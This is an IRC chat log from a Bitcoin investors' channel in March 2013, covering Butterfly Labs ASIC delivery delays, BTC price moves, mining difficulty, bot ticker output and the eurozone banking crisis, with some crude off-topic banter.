07:12:14 do you think theyll get it down to 60w tho? Mar 29 07:12:18 no Mar 29 07:12:25 not on the first run anyways Mar 29 07:12:31 possibly in the future Mar 29 07:12:32 i mean in general Mar 29 07:12:36 yea why not Mar 29 07:13:22 i would expect some compensation though.. if everyone else gets 60w units and i get sent a 195w unit because i ordered early :/ Mar 29 07:13:49 thats pretty good compensation actually Mar 29 07:13:55 what is? Mar 29 07:13:58 some extra speed? Mar 29 07:13:58 you GET it earlier too ;) Mar 29 07:14:00 lol Mar 29 07:14:08 those btc i spent though... Mar 29 07:14:10 :( Mar 29 07:14:19 worth a lot now Mar 29 07:14:49 like i said earlier im cool with it all, ill be happy just to get my asic soon Mar 29 07:14:55 so whats the napkin math for nethash gained Mar 29 07:16:00 im not sure Mar 29 07:16:15 some one did it on the forums.. not sure where that post is though Mar 29 07:16:37 arji youin the first few orders? Mar 29 07:16:53 #2511 Mar 29 07:17:01 what was the first asic order? Mar 29 07:17:04 1600 Mar 29 07:17:16 and im sure some of those orders in between are expired Mar 29 07:17:16 oh so you mightn ot get in the first batch then Mar 29 07:17:20 so maybe say 6800 untis shipped in april, which we'll shave it down to 5000 to subract for BFL derpness Mar 29 07:17:22 or not paid for Mar 29 07:17:23 oh hmm Mar 29 07:17:32 15min bitpay :p Mar 29 07:17:46 408000Ghs Mar 29 07:18:27 TAT that is not how my maths worked out :/ Mar 29 07:18:39 how did you get that number??? Mar 29 07:18:46 mine was 25 THs ish Mar 29 07:18:51 not 400 Mar 29 07:19:11 they claim they can ship 400 "units" a day Mar 29 07:19:14 you know they only have 500 chips right? Mar 29 07:19:35 i assume more wafers have been bumped by next week no? Mar 29 07:19:40 well maybe they can, but they will run out of chips before long Mar 29 07:19:47 that is all of them Mar 29 07:19:57 they have to then make a new run Mar 29 07:19:59 they had like 6 wafers on order Mar 29 07:20:05 they dont have the 5000 now, that was the order size Mar 29 07:20:22 you know what Mar 29 07:20:22 yeah, im not sure when they will get them, but they only ahve 5k now Mar 29 07:20:33 why are these fucking companies so horrible at communications Mar 29 07:20:43 they dont want to share bad news? Mar 29 07:20:59 wow back over 90 Mar 29 07:21:00 wait they have 500 chips on hand or 5000 chips Mar 29 07:21:03 [MPEX] [S.MPOE] 21150 @ 0.00067065 = 14.1842 BTC [+] Mar 29 07:21:17 5k chips in the first batch is what i thought Mar 29 07:21:21 ok Mar 29 07:21:22 yea Mar 29 07:21:28 and 1 chip is like 3 ghs or someting small Mar 29 07:21:31 im in that first batch :D Mar 29 07:21:45 it takes like 20 chips to make the 60 ghs thing Mar 29 07:21:50 are you sure? Mar 29 07:21:54 i thought it was 8 Mar 29 07:22:05 not 20 Mar 29 07:22:10 might be 8, Mar 29 07:22:10 i think more like 8 Mar 29 07:22:22 but still some orders are huge... Mar 29 07:22:36 i kinda expect only under #2000 to get filled, if that Mar 29 07:22:50 na Mar 29 07:23:18 i only expect 250 orders to get filled Mar 29 07:23:44 250 orders=250 singles? Mar 29 07:23:56 250 is an average of 20 chips per order Mar 29 07:24:07 iknow a guy who ordered 4 of the big ass ones in the first 100 orders Mar 29 07:24:07 i see Mar 29 07:24:23 well there is that 1/3 thing to Mar 29 07:24:25 someone just said BFL has 75k chips for 1st 3 batches Mar 29 07:24:37 whats inthe first batch Mar 29 07:24:40 that might be true, but first batch is 5k Mar 29 07:24:47 or is it 15k Mar 29 07:24:59 i might be wrong but i understood it to be 5k in the first batch Mar 29 07:24:59 hmm Mar 29 07:25:11 should have been 6k but they derped and made it 5k Mar 29 07:25:14 right Mar 29 07:25:28 andi heard the bfl staff is taking 105 of first batch to mine with, dont have a cource Mar 29 07:25:31 source Mar 29 07:26:28 ok Mar 29 07:26:35 way to crush my dreams Mar 29 07:27:09 they have 11 wafers in hand Mar 29 07:27:14 rest on order Mar 29 07:27:28 each wafer= how many chips? Mar 29 07:27:32 please say 5k Mar 29 07:27:34 1000 Mar 29 07:27:35 :) Mar 29 07:27:38 ok Mar 29 07:27:40 11k chips Mar 29 07:27:44 this is all from shoutbox Mar 29 07:27:47 so unofficial Mar 29 07:27:55 thats fine Mar 29 07:28:02 with 11k chips Mar 29 07:28:17 ill be in the first batch Mar 29 07:28:19 i know it :) Mar 29 07:29:29 that is if they ever ship:) Mar 29 07:29:34 https://forums.butterflylabs.com/announcements/692-bfl-asic-status-2.html#post20942 Mar 29 07:30:54 they wil Mar 29 07:30:57 at this point Mar 29 07:31:02 oh, and back at 92 we are Mar 29 07:31:06 they cant keep going Mar 29 07:31:09 if its all fake Mar 29 07:32:55 back at 92? Mar 29 07:33:16 well almost it snapped back to 92 after the big downmove Mar 29 07:33:34 yeah, that sell off did no harm Mar 29 07:33:51 this is when the buying started again the past few days Mar 29 07:34:01 this hour i mean Mar 29 07:34:27 early in europe Mar 29 07:36:16 gave my wife 370 btc today, will be fun to see how she does with them Mar 29 07:36:52 O_O Mar 29 07:36:54 adopt me Mar 29 07:38:02 lol are you a hot asian girl? Mar 29 07:38:08 no :( Mar 29 07:38:16 sorry:) Mar 29 07:41:04 [MPEX] [S.MPOE] 6150 @ 0.00067065 = 4.1245 BTC [+] Mar 29 07:42:51 [BTCTC] [ASICMINER-PT] 10 @ 0.849979 = 8.4998 BTC [-] Mar 29 07:43:08 i likethat AM price Mar 29 07:43:20 glad i got more at .7 Mar 29 07:44:09 [MPEX] [S.MPOE] 5000 @ 0.00067858 = 3.3929 BTC [+] Mar 29 07:46:06 [BTCTC] [COGNITIVE] 1 @ 0.13479 BTC [+] Mar 29 07:46:16 [BTCTC] [ASICMINER-PT] 1 @ 0.849979 BTC [-] Mar 29 07:46:38 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Mar 29 07:47:15 $10 for 46 ghs decent? Mar 29 07:47:22 [BTCTC] [BTC-BOND] 41 @ 0.009994 = 0.4098 BTC [+] Mar 29 07:47:44 where can you get 46gh for $10 Mar 29 07:47:45 fuck i mean mhs Mar 29 07:47:48 oh Mar 29 07:48:01 Seems expensive Mar 29 07:48:11 so that is like 1000 then for 46 mhs Mar 29 07:48:17 i mean ghs Mar 29 07:48:29 could be worst.... Mar 29 07:48:48 or is ti $10,000 ?> Mar 29 07:48:48 10 000 Mar 29 07:48:48 nvm Mar 29 07:48:48 cant be worst Mar 29 07:48:48 1k x 10$ Mar 29 07:48:55 nay? Mar 29 07:49:07 yeah... but $10,000 for in hand 64 gh/s now ... hmmm Mar 29 07:49:23 46... Mar 29 07:49:27 or 64 ? Mar 29 07:49:30 you said both Mar 29 07:49:37 46, oh man, i need coffee Mar 29 07:49:40 lol Mar 29 07:50:03 my minds is all over the place, doingto much at one time Mar 29 07:50:56 at current difficulty i would break even at 1 month Mar 29 07:51:26 at 10x that difficutly it would take 10 months Mar 29 07:51:31 so it seems like a fair price no? Mar 29 07:51:33 in hand.. like right now? Mar 29 07:51:37 right right now Mar 29 07:51:49 like first bfl to ship Mar 29 07:52:11 btw 92 on btc again Mar 29 07:52:18 its either 30gh/s or 60gh/s then Mar 29 07:52:21 i think Mar 29 07:52:27 its a share of a club Mar 29 07:52:30 ah Mar 29 07:52:43 they have like the 15th order and its a big one Mar 29 07:53:06 it could work.. kind of risky imo Mar 29 07:53:25 the diff is going to go up fast i think Mar 29 07:54:20 think the average will be up 1000% or less in the next 10 months? Mar 29 07:54:41 i dont know Mar 29 07:54:53 yeah, im going to buy but im not going all in :) Mar 29 07:55:11 maybe i can get in on it?.. can you make it happen ;) Mar 29 07:55:36 im buying the olny slot for sale, sorry man Mar 29 07:55:43 bummer Mar 29 07:55:58 its an old guy who needs cash now so has to sell it Mar 29 07:56:10 not old, i mean one of the first guys who ordered like a year ago Mar 29 07:56:14 kool Mar 29 08:01:53 ;;goxlag Mar 29 08:01:53 0 seconds Mar 29 08:01:55 ;;ticker Mar 29 08:01:55 BTCUSD ticker | Best bid: 90.96000, Best ask: 91.50000, Bid-ask spread: 0.54000, Last trade: 90.96000, 24 hour volume: 158643.07292808, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.24783 Mar 29 08:07:11 toffoo where are they traded if not butfunder? Mar 29 08:07:49 not traded at the moment, like gigavps .. old GLBSE holdover Mar 29 08:08:21 boo, i cant buy anything lol Mar 29 08:10:27 looking to get long hash bonds right before the difficulty spike?!? Mar 29 08:14:01 hmmm i forget they are bonds Mar 29 08:14:08 i thought i was buying into a company Mar 29 08:14:34 i dont want bonds... Mar 29 08:14:58 thanks for reminding me before i did something stupid Mar 29 08:15:21 but even so, at the right price, its good Mar 29 08:15:50 http://www.theatlanticwire.com/business/2013/03/bitcoin-now-billion-dollar-industry/63667/ Mar 29 08:16:05 and Mar 29 08:16:06 http://news.cnet.com/8301-1023_3-57576928-93/bitcoin-hits-record-exchange-values-with-cyprus-banking-crisis/ Mar 29 08:16:39 nice Mar 29 08:17:04 bought my wife a nice blue saphire ring cuz btc went ovber the 1 billion mark yesterday:) Mar 29 08:20:04 [MPEX] [S.MPOE] 4050 @ 0.00067858 = 2.7482 BTC [+] Mar 29 08:20:05 [MPEX] [S.MPOE] 18600 @ 0.00066551 = 12.3785 BTC [-] Mar 29 08:20:10 [MPEX] [S.MPOE] 10089 @ 0.00066265 = 6.6855 BTC [-] **** BEGIN LOGGING AT Fri Mar 29 14:24:01 2013 Mar 29 14:24:07 gooood mornin' Mar 29 14:25:04 Mornin! Mar 29 14:28:37 [MPEX] [S.DICE] 1373 @ 0.00375993 = 5.1624 BTC [-] Mar 29 14:28:42 http://hat4uk.wordpress.com/2013/03/29/smoke-signals-special-eurogroup-will-stop-capital-flight-now/ Mar 29 14:28:49 this is pretty interesting, the santander stuff. Mar 29 14:29:17 ’1 b) Your Money Mar 29 14:29:17 Any money held for you in an account with Santander UK plc will be held in its capacity as a bank and not as a trustee. In accordance with FSA requirements we areobliged to notify you that the client money rules on money do notapply to a Banking Consolidation Directive (BCD) in relation to deposits within the meaning of the BCD held by that institution. As a result, the money will not be held within the client money r Mar 29 14:29:17 ules of the FSA.’ Mar 29 14:29:29 [BTCTC] [GSDPT] 16 @ 0.004 = 0.064 BTC [-] Mar 29 14:31:39 ok... this whole thing is getting ridiculous... Mar 29 14:32:01 a little over my head, out of my country, but are they simply saying "fyi, your money ain't really safe" Mar 29 14:32:01 that's one word for it. Mar 29 14:32:08 ThickAsThieves pretty much. Mar 29 14:32:28 the euro is coming undone. Mar 29 14:32:58 were you against the euro/zone concept? Mar 29 14:33:14 nope Mar 29 14:35:00 i thought it was a neat idea, but didnt really follow the details at all Mar 29 14:35:13 shit certainly seems to hitting the fan though Mar 29 14:36:28 i thought it was pretty much a sensible move, back then Mar 29 14:37:05 what would happen if bitcoin really became a MAJOR safe haven for money in a short time, and then somehow, all bitcoins disappeared and/or the blockchain became irreparablely corrupted? I guess fiat would skyrocket in value? Mar 29 14:37:14 nah Mar 29 14:37:58 see, thing is : bitcoin's value was pretty huge compared to fiat (all fiat together) Mar 29 14:38:13 consequently, as fiat's shortcomings become apparent bitcoin's *price* skyrockets. Mar 29 14:38:40 conversely, fiat has absolutely no value. consequently, as bitcoin's shortcomings bercome apparent there's nothing pushing the price up. Mar 29 14:39:01 obviously if you stick to valuing things in bitcoin they'll increase apparently, but only because bitcoin itself is going down Mar 29 14:39:48 and if bitcoin disappeared and zapped billions in $ away? Mar 29 14:41:32 there'd be a lot of depression. Mar 29 14:41:51 people like me, who are currently productively employed, would jsut go fuck this and retire to private life Mar 29 14:42:09 on the net this'll make for some sexually satisfied women and a general slowdown of economic activity. Mar 29 14:42:36 and fiat holders saying nya nya told you so Mar 29 14:42:49 ya but who cares about that ? Mar 29 14:43:04 just bring it home to my first statement Mar 29 14:43:09 bringing Mar 29 14:43:20 " I guess fiat would skyrocket in value?" Mar 29 14:43:20 it's like the chickens on the conveyor belt telling the chickens attempting to escape that "they can't" Mar 29 14:43:31 and then going nya nya. dude... you're STILL on the conveyor belt Mar 29 14:43:35 see you at kfc. Mar 29 14:43:37 hehe Mar 29 14:44:28 it's an interesting notion if you think of bitcoin as an ultimate anarchistic plot to reset the economy Mar 29 14:44:34 get em all in Mar 29 14:44:40 hit reset Mar 29 14:44:44 now let's begin Mar 29 14:44:50 i don't think how it really works tho. Mar 29 14:45:06 i mean... this makes for good action flicks, because a rule of storytelling is to concentrate attention Mar 29 14:45:08 probly not Mar 29 14:45:10 [BTCTC] [PAJKA.BOND] 1 @ 0.1074 BTC [-] Mar 29 14:45:11 and a big red button does that well. Mar 29 14:45:17 however, it's not how reality works. Mar 29 14:45:24 thats is indeed how i pictured it Mar 29 14:45:28 as a movie plot Mar 29 14:46:32 people do love the fantasy of living in post-apocalyptic situations Mar 29 14:46:43 yeah, as a fantasy im sure its great. Mar 29 14:46:58 if they indeed wanted to do it tho, they'd have went to haiti after the quake Mar 29 14:47:04 Well after a month of good trades, it's time for me to go. I'll be retiring for the weekend to visit family as well as friends. Mar 29 14:47:05 to tokyo after the tsunami Mar 29 14:47:12 and in general, plenty of places to go nobody's going Mar 29 14:47:15 hf Nam Mar 29 14:47:17 Goodbye! Mar 29 14:47:19 laters Mar 29 14:47:44 i think the fantasy isnt the same as that tho Mar 29 14:48:11 it's more of being a wayfarer in an unknown world Mar 29 14:48:24 that ideally has internet for your ipad. Mar 29 14:48:30 hehe Mar 29 14:48:34 they don;'t dop that, either. Mar 29 14:48:54 look at people like tiberiusiv, ranting about how bad the world is. there's about one million towns on the globe nobody's heard of Mar 29 14:49:02 and yet very few people are wayfaring. Mar 29 14:49:11 tahts what i was just gonna say Mar 29 14:49:14 i met a few when i was doing that myself, so it's certainly not "nobody" Mar 29 14:49:16 dont need apocalypse Mar 29 14:49:22 just move to asia Mar 29 14:49:22 but it IS a superminority. Mar 29 14:49:27 without preparing Mar 29 14:49:28 or such Mar 29 14:53:18 [MPEX] [S.MPOE] 1163 @ 0.00067486 = 0.7849 BTC [-] Mar 29 14:53:22 [MPEX] [S.MPOE] 28814 @ 0.00066629 = 19.1985 BTC [-] Mar 29 14:58:30 [BTCTC] [ASICMINER-PT] 1 @ 0.848 BTC [-] Mar 29 15:01:43 hey guys, you want to hear a joke? Mar 29 15:01:45 banks Mar 29 15:01:45 ha Mar 29 15:03:23 lol Mar 29 15:04:06 lol Mar 29 15:04:42 http://www.classiccarclubphuket.com/JoeSales/Porsche997Turbo.html why the fuck is this care being sold at $350,000 usd? Mar 29 15:04:54 its like a $70k at best ? Mar 29 15:09:29 [BTCTC] [S.DICE-PT] 1 @ 0.00411 BTC [-] Mar 29 15:09:33 [BTCTC] [S.DICE-PT] 20 @ 0.0041 = 0.082 BTC [-] Mar 29 15:09:35 [BTCTC] [S.DICE-PT] 84 @ 0.00405 = 0.3402 BTC [-] Mar 29 15:09:38 [BTCTC] [S.DICE-PT] 25 @ 0.004 = 0.1 BTC [-] Mar 29 15:21:16 weekend dip starting early? Mar 29 15:24:08 Chaang-Noi: wat? you expect second round? Mar 29 15:24:11 [MPEX] [S.MPOE] 8100 @ 0.00067582 = 5.4741 BTC [+] Mar 29 15:26:35 ;;ticker Mar 29 15:26:36 BTCUSD ticker | Best bid: 88.97000, Best ask: 89.00000, Bid-ask spread: 0.03000, Last trade: 89.00000, 24 hour volume: 150244.81237909, 24 hour low: 75.00111, 24 hour high: 94.99000, 24 hour vwap: 86.73526 Mar 29 15:26:44 [MPEX] [S.MPOE] 7383 @ 0.00066629 = 4.9192 BTC [-] Mar 29 15:29:19 jurov i think some day traders are getting out of it for the long weekend Mar 29 15:29:29 i think it will be bumpy Mar 29 15:29:48 i kinda expect next tuesday to smash the 100 assuming we dont massivly correct before then Mar 29 15:30:03 but really, its just guesses Mar 29 15:31:06 ;;bc,stats Mar 29 15:31:09 Current Blocks: 228588 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1235 blocks | Next Difficulty In About: 6 days, 19 hours, 45 minutes, and 24 seconds | Next Difficulty Estimate: 7174798.69072 | Estimated Percent Change: 7.1533 Mar 29 15:32:15 so basically you expect it to go up unless it goes down ? Mar 29 15:32:26 [BTCTC] [ASICMINER-PT] 1 @ 0.847 BTC [-] Mar 29 15:33:21 it also depends how many unexercised mpoe calls are there..having potential to flood market with cash Mar 29 15:33:27 toonight Mar 29 15:34:58 i keep being the bad news of the rally ;/ Mar 29 15:35:10 haha now i seriously consider to pay deprived to make me such analysis Mar 29 15:36:15 mp i kind think it will go up after it goes down, as long as the down is not too far down Mar 29 15:36:18 oh noes, tibby. getting afk to prevent another wasted afternoon xD Mar 29 15:36:27 if we go under 75 who knowz Mar 29 15:40:00 yeah... it just sounds funny Mar 29 15:40:01 [MPEX] [S.MPOE] 3900 @ 0.00067582 = 2.6357 BTC [+] Mar 29 15:40:09 truth of the matter is nobody has a fucking clue where we're headed. Mar 29 15:40:15 which is exciting, i grant you that. Mar 29 15:40:34 yeah, i said i was guessing, just what my gut tells me what will happen :/ Mar 29 15:40:46 it is more often than not correct (assuming im not trading) Mar 29 15:41:25 tiberslav! Mar 29 15:41:43 howz my fav nigerian? Mar 29 15:46:14 ;;ticker Mar 29 15:46:15 BTCUSD ticker | Best bid: 88.81000, Best ask: 89.70000, Bid-ask spread: 0.89000, Last trade: 89.80000, 24 hour volume: 154276.06858765, 24 hour low: 75.00111, 24 hour high: 94.99000, 24 hour vwap: 86.73206 Mar 29 15:47:49 !ticker m s.mpoe Mar 29 15:47:50 [MPEX:S.MPOE] 1D: 0.0006 / 0.00065732 / 0.00068166 (466403 shares, 306.58 BTC), 7D: 0.0006 / 0.00066258 / 0.00071369 (2014556 shares, 1,334.81 BTC), 30D: 0.0006 / 0.00073358 / 0.00078628 (17129444 shares, 12,565.98 BTC) Mar 29 15:48:42 [MPEX] [S.MPOE] 6550 @ 0.00067705 = 4.4347 BTC [+] Mar 29 15:48:44 [MPEX] [S.MPOE] 16299 @ 0.00066629 = 10.8599 BTC [-] Mar 29 15:48:50 [MPEX] [S.MPOE] 5300 @ 0.00066291 = 3.5134 BTC [-] Mar 29 15:48:51 [MPEX] [S.MPOE] 5370 @ 0.00066265 = 3.5584 BTC [-] Mar 29 15:49:28 nice Mar 29 15:50:17 [BTCTC] [B.YABMC] 1 @ 0.0075 BTC [+] Mar 29 15:50:31 ;;ticker Mar 29 15:50:32 BTCUSD ticker | Best bid: 88.90001, Best ask: 88.91605, Bid-ask spread: 0.01604, Last trade: 88.90001, 24 hour volume: 154552.79615475, 24 hour low: 75.00111, 24 hour high: 94.99000, 24 hour vwap: 86.73328 Mar 29 15:52:03 !ticker h him Mar 29 15:52:04 [HAVELOCK:HIM] 1D: 1.80000000 / 1.88799 / 1.92000000 (10 shares, 18.87990000 BTC), 7D: 1.41000000 / 1.72409607 / 2.00000000 (178 shares, 306.88910091 BTC), 30D: 1.40000000 / 1.86591584 / 17.25000000 (704 shares, 1313.60475269 BTC) Mar 29 16:03:07 ;;seen smickles Mar 29 16:03:08 smickles was last seen in #bitcoin-assets 9 hours, 36 minutes, and 14 seconds ago: you can look forward to stuff like that Mar 29 16:11:27 https://bitcointalk.org/index.php?topic=101902.msg1698822#msg1698822 Mar 29 16:11:32 kinda interesting conversation going. Mar 29 16:12:02 [HAVELOCK] [SDICE] 10 @ 0.4599999 = 4.6 BTC [-] Mar 29 16:12:59 that guy is saying what we're all thinking Mar 29 16:13:44 would be nice if evoorhees, yknow, grew his business Mar 29 16:13:47 [MPEX] [S.DICE] 4098 @ 0.00419993 = 17.2113 BTC [+] Mar 29 16:13:49 [MPEX] [S.DICE] 1202 @ 0.00419995 = 5.0483 BTC [+] Mar 29 16:16:43 http://www.pcworld.com/article/2032420/major-bitcoin-exchange-slammed-with-denial-of-service-attack-as-the-currency-surges.html Mar 29 16:17:48 lol Mar 29 16:17:56 they didn't cover mpex being ddosed Mar 29 16:17:59 they are covering mtgox. Mar 29 16:18:16 i guess it's difficult to figure out what's important as a journalist. Mar 29 16:19:17 that is what the said about eminum Mar 29 16:20:08 http://www.businessweek.com/articles/2013-03-28/bitcoin-may-be-the-global-economys-last-safe-haven Mar 29 16:20:36 [BTCTC] [ASICMINER-PT] 10 @ 0.8 = 8 BTC [-] Mar 29 16:20:38 [BTCTC] [ASICMINER-PT] 1 @ 0.795 BTC [-] Mar 29 16:21:43 [BTCTC] [CRYPTO-TRADE] 14 @ 0.19997 = 2.7996 BTC [+] Mar 29 16:22:52 mircea_popescu is romanian, he cant rap Mar 29 16:23:12 i can rap yo! Mar 29 16:23:16 http://youtu.be/OMAI-OIxLPo Mar 29 16:23:18 let me show you romanians raping Mar 29 16:23:26 no rape Mar 29 16:23:35 just say no to rape mircea_popescu Mar 29 16:23:37 [BTCTC] [CRYPTO-TRADE] 50 @ 0.2 = 10 BTC [+] Mar 29 16:23:54 http://www.youtube.com/watch?v=I-yc10V8hB4 Mar 29 16:24:13 is rape like electronic rap ? Mar 29 16:24:34 e-rap Mar 29 16:24:35 hehe Mar 29 16:24:47 the beat os okay so far Mar 29 16:24:49 is Mar 29 16:24:57 meh rapper sucks Mar 29 16:25:02 nachos not hot enough, beer not cold enough.. grr Mar 29 16:25:31 this is like, romania's #1 (and pretty much only) rap band Mar 29 16:25:35 they've been going since 1992 Mar 29 16:26:00 in other words, i recall them since they were wee famished tykes. Mar 29 16:26:23 ;;ticker Mar 29 16:26:24 here's some cool rap http://www.youtube.com/watch?v=6lIqNjC1RKU Mar 29 16:26:24 BTCUSD ticker | Best bid: 89.70000, Best ask: 90.20000, Bid-ask spread: 0.50000, Last trade: 89.70000, 24 hour volume: 155011.66271357, 24 hour low: 75.00111, 24 hour high: 94.99000, 24 hour vwap: 86.70834 Mar 29 16:26:40 http://trilema.com/2010/piinea-amara-a-baietasilor-de-cartier/ << that's an old pic from like 1992, back when we were all young Mar 29 16:26:43 and they were all poor. Mar 29 16:35:11 [MPEX] [S.MPOE] 18939 @ 0.00068158 = 12.9084 BTC [+] Mar 29 16:38:22 i knew mircea_popescu had a gangster phase Mar 29 16:40:22 !last h vtx Mar 29 16:40:22 Last trade for VTX on HAVELOCK was at 0.479 BTC [+] Mar 29 16:40:30 !last m s.dice Mar 29 16:40:31 Last trade for S.DICE on MPEX was at 0.00419995 BTC [+] Mar 29 16:40:40 ;;ticker m s.dice Mar 29 16:40:41 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Mar 29 16:40:48 fuuu Mar 29 16:41:01 [HAVELOCK] [SDICE] 10 @ 0.459999 = 4.6 BTC [-] Mar 29 16:41:06 !ticker m s.dice Mar 29 16:41:08 [MPEX:S.DICE] 1D: 0.00375993 / 0.00408901 / 0.00419995 (19973 shares, 81.67 BTC), 7D: 0.0031 / 0.00338263 / 0.0045 (663485 shares, 2,244.33 BTC), 30D: 0.00300001 / 0.00454143 / 0.0063799 (1701047 shares, 7,725.20 BTC) Mar 29 16:52:33 lol at turtle down the stairs Mar 29 16:53:32 ;;ticker Mar 29 16:53:33 BTCUSD ticker | Best bid: 88.02000, Best ask: 88.89000, Bid-ask spread: 0.87000, Last trade: 88.00800, 24 hour volume: 156726.97399353, 24 hour low: 75.00111, 24 hour high: 94.99000, 24 hour vwap: 86.66077 Mar 29 16:53:38 http://www.aljazeera.com/news/asia-pacific/2013/03/2013328222926559483.html Mar 29 16:54:05 it's like something out of cartoon, fat spoiled boy leader wants to fight Mar 29 16:54:26 how long before first shot fired you think? Mar 29 16:55:26 http://news.bbcimg.co.uk/media/images/59119000/jpg/_59119706_north_korea_ranges_2.jpg Mar 29 16:55:53 I don't think it's going to happen. It's just too stupid for reality. Mar 29 16:56:23 i think you underestimate the stupid in a boy leader Mar 29 16:56:48 Perhaps. Mar 29 16:57:19 this picture is surreal http://www.bbc.co.uk/news/world-asia-21974381 Mar 29 16:57:24 But even the, it's not stupidity we are talking about. That would fall under madness. Mar 29 16:57:48 *then* Mar 29 16:58:00 [HAVELOCK] [SDICE] 2 @ 0.465 = 0.93 BTC [+] Mar 29 16:58:05 ignorance, inexperience, bravado, what have you, the boy will seek a spanking Mar 29 16:58:32 [BTCTC] [BTC-TRADING-PT] 9 @ 0.09055 = 0.815 BTC [-] Mar 29 16:58:35 [BTCTC] [BTC-TRADING-PT] 1 @ 0.09 BTC [-] Mar 29 17:00:05 It could be a good fight if it happened. That ruling family seems to be worse than all that BS in Iraq. Mar 29 17:00:13 ;;goxlag Mar 29 17:00:14 4.665253 seconds Mar 29 17:00:18 ;;ticker Mar 29 17:00:22 BTCUSD ticker | Best bid: 88.20001, Best ask: 88.60228, Bid-ask spread: 0.40227, Last trade: 88.60228, 24 hour volume: 156712.79134942, 24 hour low: 75.00111, 24 hour high: 94.99000, 24 hour vwap: 86.64491 Mar 29 17:01:17 !ticker m S.MPOE Mar 29 17:01:18 [MPEX:S.MPOE] 1D: 0.0006 / 0.00065885 / 0.00068166 (518861 shares, 341.85 BTC), 7D: 0.0006 / 0.00066283 / 0.00071369 (2067014 shares, 1,370.08 BTC), 30D: 0.0006 / 0.0007334 / 0.00078628 (17181902 shares, 12,601.26 BTC) Mar 29 17:02:14 http://www.buzzfeed.com/daves4/undeniable-proof-that-the-walking-dead-and-toy-story-have-th Mar 29 17:04:50 [BTCTC] [ASICMINER-PT] 3 @ 0.78 = 2.34 BTC [-] Mar 29 17:05:13 OneMiner nothing ever is too stupid for reality. Mar 29 17:05:21 falklands comes to mind. Mar 29 17:06:04 no, falklands really is too stupid for reality Mar 29 17:06:18 That was a supprise attack. They thought they had time. They could have walked back or negotiated. But Brittish attack craft had longer range than they thought. Mar 29 17:07:36 the brits nearly got sunk as a 1st world military power, are you kidding me ? Mar 29 17:07:43 nobody walked out of that. Mar 29 17:07:47 everyone crawled out Mar 29 17:08:17 england first world? Mar 29 17:08:25 Everybody knows that the US will bomb the poop out of just about anybody. Also the US is allied with like, half the world. Mar 29 17:08:25 i guess maybe by european standards :/ Mar 29 17:08:26 did he just say england is a first world country? Mar 29 17:08:28 lol Mar 29 17:08:46 that aint no dare first world country Mar 29 17:09:01 and their military? lol Mar 29 17:09:05 even the germans do better Mar 29 17:10:22 The Germans do *everything* better. j/k Mar 29 17:10:44 german chocolate sucks Mar 29 17:11:11 ;;nethash Mar 29 17:11:12 54791.9922646 Mar 29 17:11:17 its back Mar 29 17:11:19 https://bitcointalk.org/index.php?topic=77198.msg1697445#msg1697445 Mar 29 17:11:20 Black Forest cake is great. Mar 29 17:11:26 ;;estimate Mar 29 17:11:27 Next difficulty estimate | 7232519.52401 based on data since last change | 7654236.09946 based on data for last three days Mar 29 17:12:31 https://bitcointalk.org/index.php?topic=153138.0;all Mar 29 17:12:33 this shit's so funny Mar 29 17:12:48 Diablo-D3 drinks only distilled water, or rainwater, and only pure-grain alcohol. Mar 29 17:13:22 https://bitcointalk.org/index.php?topic=153138.msg1698753#msg1698753 << there you go copumpkin. your fractional shares! Mar 29 17:14:34 dont drink alchohol either Mar 29 17:16:58 No getting tipsy? Huff glue? Mar 29 17:17:02 j/k! Mar 29 17:19:46 so bfl forum is down Mar 29 17:19:54 https://twitter.com/BFL_News independent twitter stream doesn't look promising. Mar 29 17:20:08 bfl's "your good friend tom with blood sweat and tears" moment ? Mar 29 17:20:35 Seen this? https://forums.butterflylabs.com/announcements/692-bfl-asic-status-2.html#post20942 Mar 29 17:20:43 That looks like it's up for me. Mar 29 17:20:54 I'll pastebin it if you want. Mar 29 17:21:10 delay Mar 29 17:21:29 a now it loaded Mar 29 17:21:45 [BTCTC] [BASIC-MINING] 5 @ 0.369999 = 1.85 BTC [-] Mar 29 17:22:11 "If you'd rather have your units shipped regardless of increased power usage, we will still guarantee your hashrate by shipping you however many units are required to achieve your purchased hashrate." Mar 29 17:22:13 hm Mar 29 17:22:23 there's something i don't understand here. Mar 29 17:22:30 they took pre-orders. then they made units. Mar 29 17:22:37 Ya, sounds like their chips are crap compared to their claims. Mar 29 17:22:40 now they have to throtle units... and yet they can still deliver the same hash ? Mar 29 17:22:46 how does the math of this work ? Mar 29 17:22:59 you order 100 cows from me. i discover the cows i have only carry one teat Mar 29 17:23:02 blck magic Mar 29 17:23:10 but i tell you if you want 400 teats with your 100 cows i'll send you 400 cows Mar 29 17:23:15 well... where do i have 400 cows from ?! Mar 29 17:23:28 a wizard did it Mar 29 17:23:33 ic Mar 29 17:23:37 No, they are saying that they get worse H/j now and you can wait for the claimed H/j revised unit. Mar 29 17:23:51 OneMiner but they ALSO say that if you want delivery now they will deliver your hash Mar 29 17:23:56 with throttled units. Mar 29 17:24:14 heh wouldnt that be interesting Mar 29 17:24:14 At a higher power consumption per hash. Yes, that's how I read it too. Mar 29 17:24:17 sell intentionally throttled units Mar 29 17:24:20 right but where from ? Mar 29 17:24:23 and then keep selling the same units over and over Mar 29 17:24:27 they sold 500 units at 80 gh say Mar 29 17:24:31 just changing the firmware out with one that clocks it higher Mar 29 17:24:33 now they can only deliver 40 gh Mar 29 17:24:40 but they will deliver 1000 units to conserve hash Mar 29 17:24:45 well... where's the other units come from Mar 29 17:24:48 mircea_popescu: I don't understand your question Mar 29 17:24:52 mircea_popescu: they are manufacturing them Mar 29 17:24:56 They reduce the number of chips per unit Mar 29 17:24:58 mircea_popescu: they didn't like, manufacture 1000 and then stop Mar 29 17:25:06 and ship more units Mar 29 17:25:12 mircea_popescu: they will be forced to manufacture more units than they thought Mar 29 17:25:12 gwillen but they DID manufacture a finite amount Mar 29 17:25:18 It's not a money maker. They send more units to fill one order. They screwed up the chips or the board. Mar 29 17:25:22 if we go with the theory that they're not just halucianting the entire episode. Mar 29 17:25:28 I imagine the chips are the limiting factor Mar 29 17:25:34 